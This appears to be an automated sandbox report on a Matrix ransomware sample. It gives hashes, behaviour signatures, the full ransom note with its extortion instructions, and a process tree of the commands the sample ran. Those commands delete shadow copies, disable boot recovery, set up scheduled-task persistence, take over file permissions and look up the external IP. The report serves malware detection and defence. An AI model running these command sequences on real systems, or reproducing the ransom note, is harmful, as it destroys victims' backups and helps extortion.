Analysis

  • max time kernel
    149s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-02-2024 05:15

General

  • Target

    FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

  • Size

    1.2MB

  • MD5

    607d292bdcdde297252e002e613282ae

  • SHA1

    0161d2dd582d064f7e7f50ccb43478ff0884916a

  • SHA256

    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

  • SHA512

    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • SSDEEP

    24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: http://myexternalip.com/raw

Extracted

  • Path
    C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
  • Ransom Note
    Plain text of the dropped RTF. In the "ALTERNATIVE COMMUNICATION" section the note substitutes Cyrillic homoglyphs (written as \f1\fcharset204 escapes such as \'e5, \'ee, \'e0) for many Latin letters, which defeats simple keyword matching on the note text; they are shown here as the Latin letters they imitate. The contact e-mail addresses are redacted on the page as [email protected].

    HOW TO RECOVER YOUR FILES INSTRUCTION
    ATENTION!!!
    We are realy sorry to inform you that ALL YOUR FILES WERE ENCRYPTED by our automatic software. It became possible because of bad server security.
    ATENTION!!!
    Please don't worry, we can help you to RESTORE your server to original state and decrypt all your files quickly and safely!

    INFORMATION!!!
    Files are not broken!!!
    Files were encrypted with AES-128+RSA-2048 crypto algorithms.
    There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly DELETED AFTER 7 DAYS! You will irrevocably lose all your data!
    * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!
    * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.

    HOW TO RECOVER FILES???
    Please write us to the e-mail (write on English or use professional translator):
    [email protected]
    [email protected]
    [email protected]
    You have to send your message on each of our 3 emails due to the fact that the message may not reach their intended recipient for a variety of reasons!
    In subject line write your personal ID:
    5A6DB33418B4B4BD
    We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files.
    * Please note that files must not contain any valuable information and their total size must be less than 5Mb.

    OUR ADVICE!!!
    Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.
    We will definitely reach an agreement ;) !!!

    ALTERNATIVE COMMUNICATION
    If you did not receive the answer from the aforecited emails for more then 24 hours please send us Bitmessages from a web browser through the webpage https://bitmsg.me. Below is a tutorial on how to send bitmessage via web browser:
    1. Open in your browser the link https://bitmsg.me/users/sign_up and make the registration by entering name email and password.
    2. You must confirm the registration, return to your email and follow the instructions that were sent to you.
    3. Return to site and click "Login" label or use link https://bitmsg.me/users/sign_in, enter your email and password and click the "Sign in" button.
    4. Click the "Create Random address" button.
    5. Click the "New massage" button.
    6. Sending message:
    To: Enter address: BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1
    Subject: Enter your ID: 5A6DB33418B4B4BD
    Message: Describe what you think necessary.
    Click the "Send message" button.
    jJ9RzddM (this trailing string is set in colour-table entry 5, white, so it is invisible when the note is displayed)
  • Emails
  • URLs
    https://bitmsg.me
    https://bitmsg.me/users/sign_up
    https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe" -n
    1⤵
    • Executes dropped EXE
    PID:2668
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe"
    1⤵
    PID:2368
  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vdam32qB.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\deuNEF1q.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\deuNEF1q.bmp" /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:1588
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
        3⤵
        PID:1160
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        3⤵
        PID:1880
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2468
      • C:\Windows\SysWOW64\wscript.exe
        wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs"
        3⤵
        PID:2768
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\HbkYF590.bat" /sc minute /mo 5 /RL HIGHEST /F
          4⤵
          PID:2880
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\HbkYF590.bat" /sc minute /mo 5 /RL HIGHEST /F
            5⤵
            • Creates scheduled task(s)
            PID:1132
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
          4⤵
          PID:2324
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Run /I /tn DSHCA
            5⤵
            PID:760
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\4TIUmeBd.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Windows\SysWOW64\attrib.exe
        attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
        3⤵
        • Views/modifies file attributes
        PID:2736
      • C:\Windows\SysWOW64\cacls.exe
        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
        3⤵
        PID:3028
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
        3⤵
        • Modifies file permissions
        PID:1484
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dOTEiSx9.exe
          dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2604
          • C:\Users\Admin\AppData\Local\Temp\dOTEiSx964.exe
            dOTEiSx9.exe -accepteula "DefaultID.pdf" -nobanner
            5⤵
            • Drops file in Drivers directory
            • Sets service image path in registry
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:340
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "4271383521583077221-1187407218-50388744316234968398165325838953693401401790295"
    1⤵
    PID:3028
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {FB947233-C91B-42E6-BA15-C3FF2A2AAC6D} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
    1⤵
    PID:2896
    • C:\Windows\SYSTEM32\cmd.exe
      C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\HbkYF590.bat"
      2⤵
      PID:2712
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1772
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1656
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1616
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:436
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Delete /TN DSHCA /F
        3⤵
        PID:1212
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3972

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
    Filesize: 8KB
    MD5: ca6cc353a0a38fbd75ef7754437b0ebd
    SHA1: 87ce1b6bda1a044f04fae9e0773207883f9562f5
    SHA256: 9c827eae6072fbce97af46f0b42ac5c4076c21bdc915fb727bd047947dd0a0b8
    SHA512: 7b681b40eae96356ac97ce115deb5cc49c250c580e0251522d22fcf697616577cceb35931b9888d754f8c5d4720b7e21b3a5d927a274a2c2afdc659faeead90d

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\4TIUmeBd.bat
    Filesize: 246B
    MD5: ac19f820b572be9c936b293c37fb2b50
    SHA1: 0606d70b4e9deb0c2f28e66e5472fef5f71d1396
    SHA256: 18ca7126c00e488748aa6f95b9b2369fd8d4912e907cdcb68a0afb8a3d3ced2a
    SHA512: 210edbe95f70525b038a12d7c85f3837b452955799b67b118e73ab93bff44438bd456f0cb5be2474a8228233f0c67338d41768a83b9e905021e44e4f11629d83

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_5A6DB33418B4B4BD.txt
    Filesize: 31KB
    MD5: eb910a3a9a54500dc5f66cd897bb1574
    SHA1: 9eaa970c732dedb0f9be4697b0480b4a04cb17be
    SHA256: 8a195dee433d8b7149a6bbb3c10ef1ba136dcbdfdc49e11cfaffd61547a59fad
    SHA512: c5747c94fa851d28ba813835329a5d0ceea7f25afb79176438b323b87bd3983f45596799e0647ee2df51210c6d20c445ac02172836f0e4f4e32061e77fdac77f

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vdam32qB.txt
    Filesize: 14B
    MD5: c74dacdd9331a6698efffe81ff66ac08
    SHA1: 79e8ce4bb5cc2436e95fad4a74a31aee7aa63043
    SHA256: 82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
    SHA512: 24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

  • C:\Users\Admin\AppData\Local\Temp\dOTEiSx964.exe
    Filesize: 221KB
    MD5: 3026bc2448763d5a9862d864b97288ff
    SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
    SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
    SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

  • C:\Users\Admin\AppData\Roaming\HbkYF590.bat
    Filesize: 265B
    MD5: ac43b2ebc34f9f3778d0002e4fac71c4
    SHA1: 3c5954ec19dd0aaa77199aa57fbc122573af9c4c
    SHA256: 9bba67f8a4275952df677e02d11ec45011a34d869390ffa2d3400de3c2a41710
    SHA512: c0d1a35234d67f625329297eed5e7eb9ed45bd4adc3ecd6dbff34b0a208d8d872b4ad0c76ef4f5299017ac54ffbbdef91fb5ce3f92b603bf253407a167803f39

  • C:\Users\Admin\AppData\Roaming\xwyMIp7x.vbs
    Filesize: 260B
    MD5: afc291a3771fa24c4ff20a0fa986120e
    SHA1: b8fafbb0f289e16f9079a88cb271653aa69b7487
    SHA256: 3f207977ea639c0ce41d6bdd009dc3be7be055c5d2fbe1fc34a0e7fce18c71fc
    SHA512: 71d9cb3c26b04a08e0696186e3f047d5b3f6bcc363bc202877b4e4f095f8f2e9b475e74fd5aefa93695db791ccac570c3da1b13bba0538f6d7fe94b68c93ec20

  • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWSrMQJj.exe
    Filesize: 1.2MB
    MD5: 607d292bdcdde297252e002e613282ae
    SHA1: 0161d2dd582d064f7e7f50ccb43478ff0884916a
    SHA256: 0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65
    SHA512: 2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • \Users\Admin\AppData\Local\Temp\FoxRansomware\dOTEiSx9.exe
    Filesize: 181KB
    MD5: 2f5b509929165fc13ceab9393c3b911d
    SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
    SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
    SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

  • memory/1912-7948-0x0000000000220000-0x0000000000297000-memory.dmp
    Filesize: 476KB

  • memory/1912-1345-0x0000000000220000-0x0000000000297000-memory.dmp
    Filesize: 476KB

  • memory/2120-15-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2120-7933-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2120-7945-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2120-9358-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2120-9421-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2604-1407-0x0000000000400000-0x0000000000477000-memory.dmp
    Filesize: 476KB

  • memory/2604-7937-0x0000000000400000-0x0000000000477000-memory.dmp
    Filesize: 476KB

  • memory/2668-8-0x0000000000400000-0x000000000053F000-memory.dmp
    Filesize: 1.2MB

  • memory/2892-16-0x00000000741E0000-0x000000007478B000-memory.dmp
    Filesize: 5.7MB

  • memory/2892-14-0x0000000001C10000-0x0000000001C50000-memory.dmp
    Filesize: 256KB

  • memory/2892-13-0x0000000001C10000-0x0000000001C50000-memory.dmp
    Filesize: 256KB

  • memory/2892-12-0x00000000741E0000-0x000000007478B000-memory.dmp
    Filesize: 5.7MB

  • memory/2892-11-0x00000000741E0000-0x000000007478B000-memory.dmp
    Filesize: 5.7MB